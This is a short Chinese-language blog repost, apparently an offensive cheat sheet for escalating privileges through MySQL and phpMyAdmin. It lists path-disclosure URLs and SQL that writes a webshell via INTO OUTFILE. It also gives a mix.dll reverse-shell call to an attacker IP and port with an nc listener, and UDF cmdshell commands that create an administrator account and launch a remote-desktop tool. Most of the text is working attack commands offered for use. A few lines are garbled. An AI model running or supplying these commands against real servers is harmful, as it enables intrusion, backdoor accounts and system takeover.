昔日

27
02

利用Mysql和PHPmyadmin提权

全球互联网安全媒体知识问答平台

1:phpmyadmin 后台拿webshell 
phpmyadmin爆路径方法: 
weburl+phpmyadmin/themes/darkblue_orange/layout.inc.php
https://url/phpmyadmin/libraries/select_lang.lib.php
pphpmyadmin/libraries/export/xls.php
hpmyadmin\themes\darkblue_orange\layout.inc.php
D:\usr\www\html\phpMyAdmin\ 
----start code--- 
Create TABLE a (cmd text NOT NULL); 
Insert INTO a (cmd) VALUES(''); 
select cmd from a into outfile 'D:/usr/www/html/phpMyAdmin/d.php'; 
Drop TABLE IF EXISTS a; 
----end code--- 
2 mix.dll提权 
D:/usr/www/html/mix.dll
mysql -h 目标ip -uroot -p 
\. c:\mysql.txt
select Mixconnect('反弹ip','端口'); $ i) 
nc -vv -l -p 1983
3:udf.dll提权 
create function cmdshell returns string soname 'udf.dll' 
select cmdshell('net user user password /add'); 
select cmdshell('net localgroup administrators user /add'); 
select cmdshell('c:\3389.exe'); 
drop function cmdshell; 删除函数 
select cmdshell('netstat -an'); 
load data infile "d:\\www\\gb\\about\\about.htm" into table tmp; 
判断文件存不存在mysql的语句 

● 提权入侵● 利用Mysql● mix.dll提权● udf.dll提权
热度(1) 转载自:全球互联网安全媒体知识问答平台  

评论

热度(1)

© 昔日 | Powered by LOFTER